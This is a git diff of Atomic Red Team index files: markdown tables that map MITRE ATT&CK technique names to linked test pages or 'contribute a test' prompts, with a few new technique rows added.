+| | [Windows Management Instrumentation](../../T1047/T1047.md) | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Remote Access Software](../../T1219/T1219.md) | |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | |
+| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
+| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
+| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
+| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
+| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
+| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
+| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rc.common](../../T1037.004/T1037.004.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
+| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
+| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Rc.common](../../T1037.004/T1037.004.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
+| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Systemd Service](../../T1543.002/T1543.002.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
+| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
+| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
+| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
+| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
+| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
+| | | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
+| | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Web Shell](../../T1505.003/T1505.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Service](../../T1543.003/T1543.003.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
+| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
+| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
+| | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
@@ -122,6 +132,7 @@
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
@@ -133,9 +144,12 @@
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 0c3905e9..6c68ed7b 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -1,78 +1,80 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
